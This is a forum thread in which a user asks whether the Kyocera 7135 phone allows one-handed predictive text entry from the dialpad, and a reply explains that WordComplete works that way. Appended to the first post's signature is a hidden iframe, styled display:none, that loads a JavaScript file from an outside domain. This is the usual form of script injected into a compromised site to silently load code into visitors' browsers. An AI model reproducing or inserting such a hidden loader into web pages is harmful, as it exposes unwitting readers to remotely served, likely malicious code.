+ Reply to Thread

I want to text message with my hand

Okay....I posted a thread a month ago asking about text messaging on the Kyocera 7135. I wanted T9/predictive text entry and where to get the software if needed. I thought my question was answered as people responded by telling me to get WordComplete and software like that. However, as I read the reply's, I realized the people were responding and telling me that those software programs will give me a predictive entry, but that was with the stylus.

I want to text message with my hand with predictive text entry. I dont want to use my stylus. I currently have a T720, and before that I had a VX1, Kyocera 2235, and a LG510. On all of those I was able to send text messages with one hand using T9.

I tried using search, but T9 is too few characters and all the other threads on predictive text entry just tell me how to get software for the 7135 that will allow me to use predictive entry, but still require use of the stylus.

I didnt want to reply to my earlier post of a month ago because I felt this needed a new thread as I am being more specific and not as vague as I was before

I would be perfectly happy if I could get a software that makes the phone, including all pda apps, T9/Predictive/One hand compatible.

So I ask: Is there a way on the Kyocera 7135 to make predictive text messages by using one hand, and by that I mean pushing the numeric buttons on the pad (as opposed to using the stylus in the grafitti area)

I dont think I can ask a more clear question than that. Your response to the topic at hand would be greatly appreciated as I plan on getting the 7135 as soon as Verizon includes a rebate/drops the price.

Thanks,

cXn<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: I want to text message with my hand

Originally posted by Crucifixion
    So I ask: Is there a way on the Kyocera 7135 to make predictive text messages by using one hand, and by that I mean pushing the numeric buttons on the pad (as opposed to using the stylus in the grafitti area)

I dont think I can ask a more clear question than that.
    I just did an experiment on my 7135 in the SMS app. I used the dialpad for text entry, and I have WordComplete installed. After 2 letters I got my list of 10 word suggestions, scrolled to the one I wanted with the up/down buttons, hit the space key on the dialpad, and it filled in the word I selected... followed by a space.

Things like choosing a recipient won't be very fun without a stylus though.
    Please visit my picture site: Robert-O-Rama :)